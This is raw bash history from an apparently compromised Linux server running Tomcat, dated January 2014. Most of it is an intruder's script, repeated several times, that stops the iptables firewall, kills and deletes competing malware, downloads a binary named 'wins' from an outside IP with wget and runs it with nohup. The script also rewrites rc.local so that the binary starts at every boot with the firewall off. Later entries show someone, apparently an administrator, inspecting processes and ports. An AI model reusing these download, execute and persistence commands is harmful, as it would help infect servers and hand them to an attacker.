  465  2014-01-20 21:45:06 root killall 261180
  466  2014-01-20 21:45:06 root killall sshbin
  467  2014-01-20 21:45:06 root killall xudp
  468  2014-01-20 21:45:06 root killall xupd1
  469  2014-01-20 21:45:06 root killall xudp2
  470  2014-01-20 21:45:06 root killall xudp3
  471  2014-01-20 21:45:06 root killall xudp4
  472  2014-01-20 21:45:06 root killall xudp5
  473  2014-01-20 21:45:06 root killall /etc/idmapd/idmapd.so.cp
  474  2014-01-20 21:45:06 root killall idmapd.so.cp
  475  2014-01-20 21:45:06 root killall .IptabLex
  476  2014-01-20 21:45:06 root killall .IptabLes
  477  2014-01-20 21:45:06 root killall linuxssh
  478  2014-01-20 21:45:06 root killall strutsbin
  479  2014-01-20 21:45:06 root killall 266189
  480  2014-01-20 21:45:06 root killall auto.bin
  481  2014-01-20 21:45:06 root rm -f -r /etc/idmapd/idmapd.so.cp
  482  2014-01-20 21:45:06 root rm -f -r /tmp/linuxx
  483  2014-01-20 21:45:06 root rm -f -r /tmp/ssh3
  484  2014-01-20 21:45:06 root rm -f -r /tmp/sh4
  485  2014-01-20 21:45:06 root rm -f -r /tmp/ssh6
  486  2014-01-20 21:45:06 root rm -f -r /tmp/ssh-32
  487  2014-01-20 21:45:06 root rm -f -r /tmp/ssh-64
  488  2014-01-20 21:45:06 root rm -f -r /tmp/ssh-c4
  489  2014-01-20 21:45:06 root rm -f -r /tmp/drmc
  490  2014-01-20 21:45:06 root rm -f -r /tmp/tmpof
  491  2014-01-20 21:45:06 root rm -f -r /tmp/1471
  492  2014-01-20 21:45:06 root rm -f -r /tmp/1417
  493  2014-01-20 21:45:06 root rm -f -r /tmp/v432
  494  2014-01-20 21:45:06 root rm -f -r /tmp/v532
  495  2014-01-20 21:45:06 root rm -f -r /tmp/29881
  496  2014-01-20 21:45:06 root rm -f -r /tmp/10993
  497  2014-01-20 21:45:06 root rm -f -r /tmp/behsdf
  498  2014-01-20 21:45:06 root rm -f -r /tmp/helen
  499  2014-01-20 21:45:06 root rm -f -r /tmp/lampp
  500  2014-01-20 21:45:06 root rm -f -r /tmp/Umi34Ber
  501  2014-01-20 21:45:06 root rm -f -r /tmp/mysql.sock
  502  2014-01-20 21:45:06 root rm -f -r /tmp/266189
  503  2014-01-20 21:45:06 root rm -f -r /etc/x1
  504  2014-01-20 21:45:06 root rm -f -r /etc/xxx
  505  2014-01-20 21:45:06 root rm -f -r /etc/dos32
  506  2014-01-20 21:45:06 root rm -f -r /etc/dos64
  507  2014-01-20 21:45:06 root rm -f -r /etc/007
  508  2014-01-20 21:45:06 root rm -f -r /etc/t32
  509  2014-01-20 21:45:06 root rm -f -r /etc/lq64
  510  2014-01-20 21:45:06 root rm -f -r /etc/t64
  511  2014-01-20 21:45:06 root rm -f -r /etc/lq32
  512  2014-01-20 21:45:06 root rm -f -r /etc/java.132.8_11
  513  2014-01-20 21:45:06 root rm -f -r /etc/idmapd/apd.so.cp
  514  2014-01-20 21:45:06 root rm -f -r /tmp/sshbin
  515  2014-01-20 21:45:06 root rm -f -r /tmp/xudp
  516  2014-01-20 21:45:06 root rm -f -r /tmp/xupd1
  517  2014-01-20 21:45:06 root rm -f -r /tmp/xudp2
  518  2014-01-20 21:45:06 root rm -f -r /tmp/xudp3
  519  2014-01-20 21:45:06 root rm -f -r /tmp/xudp4
  520  2014-01-20 21:45:06 root rm -f -r /tmp/xudp5
  521  2014-01-20 21:45:06 root rm -f -r /tmp/java.2.15.22_20
  522  2014-01-20 21:45:06 root rm -f -r /tmp/linuxssh
  523  2014-01-20 21:45:06 root rm -f -r /tmp/strutsbin
  524  2014-01-20 21:45:06 root rm -f -r /tmp/266189
  525  2014-01-20 21:45:06 root rm -f -r etc/java.13.2.8_11
  526  2014-01-20 21:45:06 root rm -f -r /etc/auto.bin
  527  2014-01-20 21:45:06 root find /etc/ -name "*.service2" -exec rm {} \;
  528  2014-01-20 21:45:06 root killall java-2013
  529  2014-01-20 21:45:06 root killall wins
  530  2014-01-20 21:45:06 root rm -f -r /etc/wins
  531  2014-01-20 21:45:06 root rm -f -r /etc/java-2013
  532  2014-01-20 21:45:06 root rm -f -r /etc/java-2013/java-2013
  533  2014-01-20 21:45:06 root mkdir /etc/wins
  534  2014-01-20 21:45:06 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  535  2014-01-20 21:45:07 root chmod 0755 /etc/wins/wins
  536  2014-01-20 21:45:07 root nohup /etc/wins/wins > /dev/null 2>&1 &
  537  2014-01-20 21:45:07 root rm -f -r /etc/rc.local
  538  2014-01-20 21:45:07 root rm -r -f /etc/rc.d/rc.local
  539  2014-01-20 21:45:07 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  540  2014-01-20 21:45:07 root echo "cd /etc/wins">>/etc/rc.local
  541  2014-01-20 21:45:07 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  542  2014-01-20 21:45:07 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  543  2014-01-20 21:45:07 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  544  2014-01-20 21:45:07 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  545  2014-01-20 21:45:07 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  546  2014-01-20 21:45:07 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  547  2014-01-20 21:45:07 root rm -f -r 2618
  548  2014-01-20 21:45:07 root rm -r -f TS269
  549  2014-01-20 21:45:07 root exit
  550  2014-01-20 21:58:47 root /etc/init.d/iptables stop
  551  2014-01-20 21:58:47 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  552  2014-01-20 21:58:47 root chmod 0775 /usr/bin/nohup
  553  2014-01-20 21:58:47 root chmod 0775 /usr/bin/killall
  554  2014-01-20 21:58:47 root killall lixtest
  555  2014-01-20 21:58:47 root killall linuxx
  556  2014-01-20 21:58:47 root killall ssh3
  557  2014-01-20 21:58:47 root killall ssh4
  558  2014-01-20 21:58:47 root killall ssh6
  559  2014-01-20 21:58:47 root killall ssh-32
  560  2014-01-20 21:58:47 root killall ssh-64
  561  2014-01-20 21:58:47 root killall ssh-c4
  562  2014-01-20 21:58:47 root killall java.13.2.8_11
  563  2014-01-20 21:58:47 root killall drmc
  564  2014-01-20 21:58:47 root killall tmpof
  565  2014-01-20 21:58:47 root killall 1471
  566  2014-01-20 21:58:47 root killall 1417
  567  2014-01-20 21:58:47 root killall v432
  568  2014-01-20 21:58:47 root killall v532
  569  2014-01-20 21:58:47 root killall 29881
  570  2014-01-20 21:58:47 root killall 10993
  571  2014-01-20 21:58:47 root killall behsdf
  572  2014-01-20 21:58:47 root killall helen
  573  2014-01-20 21:58:47 root killall lampp
  574  2014-01-20 21:58:47 root killall Umi34Ber
  575  2014-01-20 21:58:47 root killall mysql.sock
  576  2014-01-20 21:58:47 root killall sshd
  577  2014-01-20 21:58:47 root killall xxx
  578  2014-01-20 21:58:47 root killall dos32
  579  2014-01-20 21:58:47 root killall dos64
  580  2014-01-20 21:58:47 root killall 007
  581  2014-01-20 21:58:47 root killall t32
  582  2014-01-20 21:58:47 root killall lq64
  583  2014-01-20 21:58:47 root killall t64
  584  2014-01-20 21:58:47 root killall lq32
  585  2014-01-20 21:58:47 root killall java.132.8_11
  586  2014-01-20 21:58:47 root killall 261180
  587  2014-01-20 21:58:47 root killall sshbin
  588  2014-01-20 21:58:47 root killall xudp
  589  2014-01-20 21:58:47 root killall xupd1
  590  2014-01-20 21:58:47 root killall xudp2
  591  2014-01-20 21:58:47 root killall xudp3
  592  2014-01-20 21:58:47 root killall xudp4
  593  2014-01-20 21:58:47 root killall xudp5
  594  2014-01-20 21:58:47 root killall /etc/idmapd/idmapd.so.cp
  595  2014-01-20 21:58:47 root killall idmapd.so.cp
  596  2014-01-20 21:58:47 root killall .IptabLex
  597  2014-01-20 21:58:47 root killall .IptabLes
  598  2014-01-20 21:58:47 root killall linuxssh
  599  2014-01-20 21:58:47 root killall strutsbin
  600  2014-01-20 21:58:47 root killall 266189
  601  2014-01-20 21:58:47 root killall auto.bin
  602  2014-01-20 21:58:47 root rm -f -r /etc/idmapd/idmapd.so.cp
  603  2014-01-20 21:58:47 root rm -f -r /tmp/linuxx
  604  2014-01-20 21:58:47 root rm -f -r /tmp/ssh3
  605  2014-01-20 21:58:47 root rm -f -r /tmp/sh4
  606  2014-01-20 21:58:47 root rm -f -r /tmp/ssh6
  607  2014-01-20 21:58:47 root rm -f -r /tmp/ssh-32
  608  2014-01-20 21:58:47 root rm -f -r /tmp/ssh-64
  609  2014-01-20 21:58:47 root rm -f -r /tmp/ssh-c4
  610  2014-01-20 21:58:47 root rm -f -r /tmp/drmc
  611  2014-01-20 21:58:47 root rm -f -r /tmp/tmpof
  612  2014-01-20 21:58:47 root rm -f -r /tmp/1471
  613  2014-01-20 21:58:47 root rm -f -r /tmp/1417
  614  2014-01-20 21:58:47 root rm -f -r /tmp/v432
  615  2014-01-20 21:58:47 root rm -f -r /tmp/v532
  616  2014-01-20 21:58:47 root rm -f -r /tmp/29881
  617  2014-01-20 21:58:47 root rm -f -r /tmp/10993
  618  2014-01-20 21:58:47 root rm -f -r /tmp/behsdf
  619  2014-01-20 21:58:47 root rm -f -r /tmp/helen
  620  2014-01-20 21:58:47 root rm -f -r /tmp/lampp
  621  2014-01-20 21:58:47 root rm -f -r /tmp/Umi34Ber
  622  2014-01-20 21:58:47 root rm -f -r /tmp/mysql.sock
  623  2014-01-20 21:58:47 root rm -f -r /tmp/266189
  624  2014-01-20 21:58:47 root rm -f -r /etc/x1
  625  2014-01-20 21:58:47 root rm -f -r /etc/xxx
  626  2014-01-20 21:58:47 root rm -f -r /etc/dos32
  627  2014-01-20 21:58:47 root rm -f -r /etc/dos64
  628  2014-01-20 21:58:47 root rm -f -r /etc/007
  629  2014-01-20 21:58:47 root rm -f -r /etc/t32
  630  2014-01-20 21:58:47 root rm -f -r /etc/lq64
  631  2014-01-20 21:58:47 root rm -f -r /etc/t64
  632  2014-01-20 21:58:47 root rm -f -r /etc/lq32
  633  2014-01-20 21:58:47 root rm -f -r /etc/java.132.8_11
  634  2014-01-20 21:58:47 root rm -f -r /etc/idmapd/apd.so.cp
  635  2014-01-20 21:58:47 root rm -f -r /tmp/sshbin
  636  2014-01-20 21:58:47 root rm -f -r /tmp/xudp
  637  2014-01-20 21:58:47 root rm -f -r /tmp/xupd1
  638  2014-01-20 21:58:47 root rm -f -r /tmp/xudp2
  639  2014-01-20 21:58:47 root rm -f -r /tmp/xudp3
  640  2014-01-20 21:58:47 root rm -f -r /tmp/xudp4
  641  2014-01-20 21:58:47 root rm -f -r /tmp/xudp5
  642  2014-01-20 21:58:47 root rm -f -r /tmp/java.2.15.22_20
  643  2014-01-20 21:58:47 root rm -f -r /tmp/linuxssh
  644  2014-01-20 21:58:47 root rm -f -r /tmp/strutsbin
  645  2014-01-20 21:58:47 root rm -f -r /tmp/266189
  646  2014-01-20 21:58:47 root rm -f -r etc/java.13.2.8_11
  647  2014-01-20 21:58:47 root rm -f -r /etc/auto.bin
  648  2014-01-20 21:58:47 root find /etc/ -name "*.service2" -exec rm {} \;
  649  2014-01-20 21:58:47 root killall java-2013
  650  2014-01-20 21:58:47 root killall wins
  651  2014-01-20 21:58:47 root rm -f -r /etc/wins
  652  2014-01-20 21:58:47 root rm -f -r /etc/java-2013
  653  2014-01-20 21:58:47 root rm -f -r /etc/java-2013/java-2013
  654  2014-01-20 21:58:47 root mkdir /etc/wins
  655  2014-01-20 21:58:47 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  656  2014-01-20 21:58:49 root chmod 0755 /etc/wins/wins
  657  2014-01-20 21:58:49 root nohup /etc/wins/wins > /dev/null 2>&1 &
  658  2014-01-20 21:58:49 root rm -f -r /etc/rc.local
  659  2014-01-20 21:58:49 root rm -r -f /etc/rc.d/rc.local
  660  2014-01-20 21:58:49 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  661  2014-01-20 21:58:49 root echo "cd /etc/wins">>/etc/rc.local
  662  2014-01-20 21:58:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  663  2014-01-20 21:58:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  664  2014-01-20 21:58:49 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  665  2014-01-20 21:58:49 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  666  2014-01-20 21:58:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  667  2014-01-20 21:58:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  668  2014-01-20 21:58:49 root rm -f -r 2618
  669  2014-01-20 21:58:49 root rm -r -f TS269
  670  2014-01-20 21:58:49 root exit
  671  2014-01-20 22:01:32 root /etc/init.d/iptables stop
  672  2014-01-20 22:01:32 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  673  2014-01-20 22:01:32 root chmod 0775 /usr/bin/nohup
  674  2014-01-20 22:01:32 root chmod 0775 /usr/bin/killall
  675  2014-01-20 22:01:32 root killall lixtest
  676  2014-01-20 22:01:32 root killall linuxx
  677  2014-01-20 22:01:32 root killall ssh3
  678  2014-01-20 22:01:32 root killall ssh4
  679  2014-01-20 22:01:32 root killall ssh6
  680  2014-01-20 22:01:32 root killall ssh-32
  681  2014-01-20 22:01:32 root killall ssh-64
  682  2014-01-20 22:01:32 root killall ssh-c4
  683  2014-01-20 22:01:32 root killall java.13.2.8_11
  684  2014-01-20 22:01:32 root killall drmc
  685  2014-01-20 22:01:32 root killall tmpof
  686  2014-01-20 22:01:32 root killall 1471
  687  2014-01-20 22:01:32 root killall 1417
  688  2014-01-20 22:01:32 root killall v432
  689  2014-01-20 22:01:32 root killall v532
  690  2014-01-20 22:01:32 root killall 29881
  691  2014-01-20 22:01:32 root killall 10993
  692  2014-01-20 22:01:32 root killall behsdf
  693  2014-01-20 22:01:32 root killall helen
  694  2014-01-20 22:01:32 root killall lampp
  695  2014-01-20 22:01:32 root killall Umi34Ber
  696  2014-01-20 22:01:32 root killall mysql.sock
  697  2014-01-20 22:01:32 root killall sshd
  698  2014-01-20 22:01:32 root killall xxx
  699  2014-01-20 22:01:32 root killall dos32
  700  2014-01-20 22:01:32 root killall dos64
  701  2014-01-20 22:01:32 root killall 007
  702  2014-01-20 22:01:32 root killall t32
  703  2014-01-20 22:01:32 root killall lq64
  704  2014-01-20 22:01:32 root killall t64
  705  2014-01-20 22:01:32 root killall lq32
  706  2014-01-20 22:01:32 root killall java.132.8_11
  707  2014-01-20 22:01:32 root killall 261180
  708  2014-01-20 22:01:32 root killall sshbin
  709  2014-01-20 22:01:32 root killall xudp
  710  2014-01-20 22:01:32 root killall xupd1
  711  2014-01-20 22:01:32 root killall xudp2
  712  2014-01-20 22:01:32 root killall xudp3
  713  2014-01-20 22:01:32 root killall xudp4
  714  2014-01-20 22:01:32 root killall xudp5
  715  2014-01-20 22:01:32 root killall /etc/idmapd/idmapd.so.cp
  716  2014-01-20 22:01:32 root killall idmapd.so.cp
  717  2014-01-20 22:01:32 root killall .IptabLex
  718  2014-01-20 22:01:32 root killall .IptabLes
  719  2014-01-20 22:01:32 root killall linuxssh
  720  2014-01-20 22:01:32 root killall strutsbin
  721  2014-01-20 22:01:32 root killall 266189
  722  2014-01-20 22:01:32 root killall auto.bin
  723  2014-01-20 22:01:32 root rm -f -r /etc/idmapd/idmapd.so.cp
  724  2014-01-20 22:01:32 root rm -f -r /tmp/linuxx
  725  2014-01-20 22:01:32 root rm -f -r /tmp/ssh3
  726  2014-01-20 22:01:32 root rm -f -r /tmp/sh4
  727  2014-01-20 22:01:32 root rm -f -r /tmp/ssh6
  728  2014-01-20 22:01:32 root rm -f -r /tmp/ssh-32
  729  2014-01-20 22:01:32 root rm -f -r /tmp/ssh-64
  730  2014-01-20 22:01:32 root rm -f -r /tmp/ssh-c4
  731  2014-01-20 22:01:32 root rm -f -r /tmp/drmc
  732  2014-01-20 22:01:32 root rm -f -r /tmp/tmpof
  733  2014-01-20 22:01:32 root rm -f -r /tmp/1471
  734  2014-01-20 22:01:32 root rm -f -r /tmp/1417
  735  2014-01-20 22:01:32 root rm -f -r /tmp/v432
  736  2014-01-20 22:01:32 root rm -f -r /tmp/v532
  737  2014-01-20 22:01:32 root rm -f -r /tmp/29881
  738  2014-01-20 22:01:32 root rm -f -r /tmp/10993
  739  2014-01-20 22:01:32 root rm -f -r /tmp/behsdf
  740  2014-01-20 22:01:32 root rm -f -r /tmp/helen
  741  2014-01-20 22:01:32 root rm -f -r /tmp/lampp
  742  2014-01-20 22:01:32 root rm -f -r /tmp/Umi34Ber
  743  2014-01-20 22:01:32 root rm -f -r /tmp/mysql.sock
  744  2014-01-20 22:01:32 root rm -f -r /tmp/266189
  745  2014-01-20 22:01:32 root rm -f -r /etc/x1
  746  2014-01-20 22:01:32 root rm -f -r /etc/xxx
  747  2014-01-20 22:01:32 root rm -f -r /etc/dos32
  748  2014-01-20 22:01:32 root rm -f -r /etc/dos64
  749  2014-01-20 22:01:32 root rm -f -r /etc/007
  750  2014-01-20 22:01:32 root rm -f -r /etc/t32
  751  2014-01-20 22:01:32 root rm -f -r /etc/lq64
  752  2014-01-20 22:01:32 root rm -f -r /etc/t64
  753  2014-01-20 22:01:32 root rm -f -r /etc/lq32
  754  2014-01-20 22:01:32 root rm -f -r /etc/java.132.8_11
  755  2014-01-20 22:01:32 root rm -f -r /etc/idmapd/apd.so.cp
  756  2014-01-20 22:01:32 root rm -f -r /tmp/sshbin
  757  2014-01-20 22:01:32 root rm -f -r /tmp/xudp
  758  2014-01-20 22:01:32 root rm -f -r /tmp/xupd1
  759  2014-01-20 22:01:32 root rm -f -r /tmp/xudp2
  760  2014-01-20 22:01:32 root rm -f -r /tmp/xudp3
  761  2014-01-20 22:01:32 root rm -f -r /tmp/xudp4
  762  2014-01-20 22:01:32 root rm -f -r /tmp/xudp5
  763  2014-01-20 22:01:32 root rm -f -r /tmp/java.2.15.22_20
  764  2014-01-20 22:01:32 root rm -f -r /tmp/linuxssh
  765  2014-01-20 22:01:32 root rm -f -r /tmp/strutsbin
  766  2014-01-20 22:01:32 root rm -f -r /tmp/266189
  767  2014-01-20 22:01:32 root rm -f -r etc/java.13.2.8_11
  768  2014-01-20 22:01:32 root rm -f -r /etc/auto.bin
  769  2014-01-20 22:01:32 root find /etc/ -name "*.service2" -exec rm {} \;
  770  2014-01-20 22:01:32 root killall java-2013
  771  2014-01-20 22:01:32 root killall wins
  772  2014-01-20 22:01:32 root rm -f -r /etc/wins
  773  2014-01-20 22:01:32 root rm -f -r /etc/java-2013
  774  2014-01-20 22:01:32 root rm -f -r /etc/java-2013/java-2013
  775  2014-01-20 22:01:32 root mkdir /etc/wins
  776  2014-01-20 22:01:32 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  777  2014-01-20 22:01:34 root chmod 0755 /etc/wins/wins
  778  2014-01-20 22:01:34 root nohup /etc/wins/wins > /dev/null 2>&1 &
  779  2014-01-20 22:01:34 root rm -f -r /etc/rc.local
  780  2014-01-20 22:01:34 root rm -r -f /etc/rc.d/rc.local
  781  2014-01-20 22:01:34 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  782  2014-01-20 22:01:34 root echo "cd /etc/wins">>/etc/rc.local
  783  2014-01-20 22:01:34 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  784  2014-01-20 22:01:34 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  785  2014-01-20 22:01:34 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  786  2014-01-20 22:01:34 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  787  2014-01-20 22:01:34 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  788  2014-01-20 22:01:34 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  789  2014-01-20 22:01:34 root rm -f -r 2618
  790  2014-01-20 22:01:34 root rm -r -f TS269
  791  2014-01-20 22:01:34 root exit
  792  2014-01-20 22:13:18 root ps -ef
  793  2014-01-20 22:13:25 root ps -ef |more
  794  2014-01-20 22:15:05 root ps -ef |more
  795  2014-01-20 22:16:34 root ps -ef |more
  796  2014-01-20 22:17:08 root top
  797  2014-01-20 22:17:20 root ps -ef |more
  798  2014-01-20 22:18:17 root ll -a /
  799  2014-01-20 22:18:58 root ll -a /boot/
  800  2014-01-20 22:19:39 root ps -ef |more
  801  2014-01-20 22:21:02 root netstat -nltp
  802  2014-01-20 22:21:18 root netstat -nltp
  803  2014-01-20 22:23:10 root cd /opt/apache-tomcat-6.0.26/
  804  2014-01-20 22:23:11 root ls
  805  2014-01-20 22:23:15 root cd conf
  806  2014-01-20 22:23:16 root ls
  807  2014-01-20 22:23:37 root vi server.xml
  808  2014-01-20 22:25:09 root netstat -nltp
  809  2014-01-20 22:25:23 root vi server.xml
  810  2014-01-20 22:25:39 root netstat -nltp
  811  2014-01-20 22:25:57 root history
  812  2014-01-20 22:26:25 root cd /etc/idmapd/
  813  2014-01-20 22:26:31 root ll -a ./
  814  2014-01-20 22:26:47 root rm -r -f /etc/idmapd
  815  2014-01-20 22:26:52 root cd /etc/idmapd/
  816  2014-01-20 22:27:36 root vi server.xml
  817  2014-01-20 22:27:53 root pwd
  818  2014-01-20 22:28:02 root cd /opt/apache-tomcat-6.0.26/conf
  819  2014-01-20 22:28:03 root ls
  820  2014-01-20 22:28:09 root vi server.xml
  821  2014-01-20 22:12:32 root w
  822  2014-01-20 22:12:41 root crontab -e
  823  2014-01-20 22:12:56 root ps -efjH
  824  2014-01-20 22:13:02 root cd /tmp/
  825  2014-01-20 22:13:02 root ll
  826  2014-01-20 22:13:06 root cat winskilled
  827  2014-01-20 22:13:18 root ps -efjH
  828  2014-01-20 22:14:04 root cd
  829  2014-01-20 22:14:08 root cdf
  830  2014-01-20 22:14:10 root cdl
  831  2014-01-20 22:14:11 root ls
  832  2014-01-20 22:14:13 root cd
  833  2014-01-20 22:14:13 root ls
  834  2014-01-20 22:14:15 root vi killback.sh
  835  2014-01-20 22:15:22 root cd /tmp/
  836  2014-01-20 22:15:22 root ls
  837  2014-01-20 22:15:27 root cat winskilled
  838  2014-01-20 22:16:23 root 平时
  839  2014-01-20 22:16:25 root ps -efjH
  840  2014-01-20 22:23:37 root :q
  841  2014-01-20 22:27:04 root tail -f /tmp/winskilled
  842  2014-01-20 22:29:08 root 227909
  843  2014-01-20 22:29:08 root netstat -nltp
  844  2014-01-20 22:25:23 root vi server.xml
  845  2014-01-20 22:25:39 root netstat -nltp
  846  2014-01-20 22:25:57 root history
  847  2014-01-20 22:26:25 root cd /etc/idmapd/
  848  2014-01-20 22:26:31 root ll -a ./
  849  2014-01-20 22:26:47 root rm -r -f /etc/idmapd
  850  2014-01-20 22:26:52 root cd /etc/idmapd/
  851  2014-01-20 22:27:36 root vi server.xml
  852  2014-01-20 22:27:53 root pwd
  853  2014-01-20 22:28:02 root cd /opt/apache-tomcat-6.0.26/conf
  854  2014-01-20 22:28:03 root ls
  855  2014-01-20 22:28:09 root vi server.xml
  856  2014-01-20 22:19:21 root crontab -l
  857  2014-01-20 22:19:28 root crontab -l
  858  2014-01-20 22:19:29 root cd /tmp/
  859  2014-01-20 22:19:30 root ll
  860  2014-01-20 22:19:34 root tail -f winskilled
  861  2014-01-20 22:21:14 root ps -ef|grep -v grep |grep wins
  862  2014-01-20 22:21:19 root ps -ef|grep -v grep
  863  2014-01-20 22:21:21 root ps -ef|grep -v grep |grep wins
  864  2014-01-20 22:21:28 root ps -ef |grep wins
  865  2014-01-20 22:21:43 root ps -ef|grep -v grep |grep wins -C3
  866  2014-01-20 22:21:46 root ps -ef|grep -v grep |grep wins -C3
  867  2014-01-20 22:23:28 root :q:::q
  868  2014-01-20 22:23:43 root ps
  869  2014-01-20 22:23:44 root ll
  870  2014-01-20 22:23:47 root tail -f winskilled
  871  2014-01-20 22:23:58 root vi winskilled
  872  2014-01-20 22:24:19 root :q
  873  2014-01-20 22:24:24 root vi winskilled
  874  2014-01-20 22:24:30 root o
  875  2014-01-20 22:24:37 root vi winskilled
  876  2014-01-20 22:24:44 root vi winskilled
  877  2014-01-20 22:24:50 root ll
  878  2014-01-20 22:24:55 root vi winskilled
  879  2014-01-20 22:25:04 root cat /root/killback.sh
  880  2014-01-20 22:28:19 root /etc/init.d/iptables stop
  881  2014-01-20 22:28:19 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  882  2014-01-20 22:28:19 root chmod 0775 /usr/bin/nohup
  883  2014-01-20 22:28:19 root chmod 0775 /usr/bin/killall
  884  2014-01-20 22:28:19 root killall lixtest
  885  2014-01-20 22:28:19 root killall linuxx
  886  2014-01-20 22:28:19 root killall ssh3
  887  2014-01-20 22:28:19 root killall ssh4
  888  2014-01-20 22:28:19 root killall ssh6
  889  2014-01-20 22:28:19 root killall ssh-32
  890  2014-01-20 22:28:19 root killall ssh-64
  891  2014-01-20 22:28:19 root killall ssh-c4
  892  2014-01-20 22:28:19 root killall java.13.2.8_11
  893  2014-01-20 22:28:19 root killall drmc
  894  2014-01-20 22:28:19 root killall tmpof
  895  2014-01-20 22:28:19 root killall 1471
  896  2014-01-20 22:28:19 root killall 1417
  897  2014-01-20 22:28:19 root killall v432
  898  2014-01-20 22:28:19 root killall v532
  899  2014-01-20 22:28:19 root killall 29881
  900  2014-01-20 22:28:19 root killall 10993
  901  2014-01-20 22:28:19 root killall behsdf
  902  2014-01-20 22:28:19 root killall helen
  903  2014-01-20 22:28:19 root killall lampp
  904  2014-01-20 22:28:19 root killall Umi34Ber
  905  2014-01-20 22:28:19 root killall mysql.sock
  906  2014-01-20 22:28:19 root killall sshd
  907  2014-01-20 22:28:19 root killall xxx
  908  2014-01-20 22:28:19 root killall dos32
  909  2014-01-20 22:28:19 root killall dos64
  910  2014-01-20 22:28:19 root killall 007
  911  2014-01-20 22:28:19 root killall t32
  912  2014-01-20 22:28:19 root killall lq64
  913  2014-01-20 22:28:19 root killall t64
  914  2014-01-20 22:28:19 root killall lq32
  915  2014-01-20 22:28:19 root killall java.132.8_11
  916  2014-01-20 22:28:19 root killall 261180
  917  2014-01-20 22:28:19 root killall sshbin
  918  2014-01-20 22:28:19 root killall xudp
  919  2014-01-20 22:28:19 root killall xupd1
  920  2014-01-20 22:28:19 root killall xudp2
  921  2014-01-20 22:28:19 root killall xudp3
  922  2014-01-20 22:28:19 root killall xudp4
  923  2014-01-20 22:28:19 root killall xudp5
  924  2014-01-20 22:28:20 root killall /etc/idmapd/idmapd.so.cp
  925  2014-01-20 22:28:20 root killall idmapd.so.cp
  926  2014-01-20 22:28:20 root killall .IptabLex
  927  2014-01-20 22:28:20 root killall .IptabLes
  928  2014-01-20 22:28:20 root killall linuxssh
  929  2014-01-20 22:28:20 root killall strutsbin
  930  2014-01-20 22:28:20 root killall 266189
  931  2014-01-20 22:28:20 root killall auto.bin
  932  2014-01-20 22:28:20 root rm -f -r /etc/idmapd/idmapd.so.cp
  933  2014-01-20 22:28:20 root rm -f -r /tmp/linuxx
  934  2014-01-20 22:28:20 root rm -f -r /tmp/ssh3
  935  2014-01-20 22:28:20 root rm -f -r /tmp/sh4
  936  2014-01-20 22:28:20 root rm -f -r /tmp/ssh6
  937  2014-01-20 22:28:20 root rm -f -r /tmp/ssh-32
  938  2014-01-20 22:28:20 root rm -f -r /tmp/ssh-64
  939  2014-01-20 22:28:20 root rm -f -r /tmp/ssh-c4
  940  2014-01-20 22:28:20 root rm -f -r /tmp/drmc
  941  2014-01-20 22:28:20 root rm -f -r /tmp/tmpof
  942  2014-01-20 22:28:20 root rm -f -r /tmp/1471
  943  2014-01-20 22:28:20 root rm -f -r /tmp/1417
  944  2014-01-20 22:28:20 root rm -f -r /tmp/v432
  945  2014-01-20 22:28:20 root rm -f -r /tmp/v532
  946  2014-01-20 22:28:20 root rm -f -r /tmp/29881
  947  2014-01-20 22:28:20 root rm -f -r /tmp/10993
  948  2014-01-20 22:28:20 root rm -f -r /tmp/behsdf
  949  2014-01-20 22:28:20 root rm -f -r /tmp/helen
  950  2014-01-20 22:28:20 root rm -f -r /tmp/lampp
  951  2014-01-20 22:28:20 root rm -f -r /tmp/Umi34Ber
  952  2014-01-20 22:28:20 root rm -f -r /tmp/mysql.sock
  953  2014-01-20 22:28:20 root rm -f -r /tmp/266189
  954  2014-01-20 22:28:20 root rm -f -r /etc/x1
  955  2014-01-20 22:28:20 root rm -f -r /etc/xxx
  956  2014-01-20 22:28:20 root rm -f -r /etc/dos32
  957  2014-01-20 22:28:20 root rm -f -r /etc/dos64
  958  2014-01-20 22:28:20 root rm -f -r /etc/007
  959  2014-01-20 22:28:20 root rm -f -r /etc/t32
  960  2014-01-20 22:28:20 root rm -f -r /etc/lq64
  961  2014-01-20 22:28:20 root rm -f -r /etc/t64
  962  2014-01-20 22:28:20 root rm -f -r /etc/lq32
  963  2014-01-20 22:28:20 root rm -f -r /etc/java.132.8_11
  964  2014-01-20 22:28:20 root rm -f -r /etc/idmapd/apd.so.cp
  965  2014-01-20 22:28:20 root rm -f -r /tmp/sshbin
  966  2014-01-20 22:28:20 root rm -f -r /tmp/xudp
  967  2014-01-20 22:28:20 root rm -f -r /tmp/xupd1
  968  2014-01-20 22:28:20 root rm -f -r /tmp/xudp2
  969  2014-01-20 22:28:20 root rm -f -r /tmp/xudp3
  970  2014-01-20 22:28:20 root rm -f -r /tmp/xudp4
  971  2014-01-20 22:28:20 root rm -f -r /tmp/xudp5
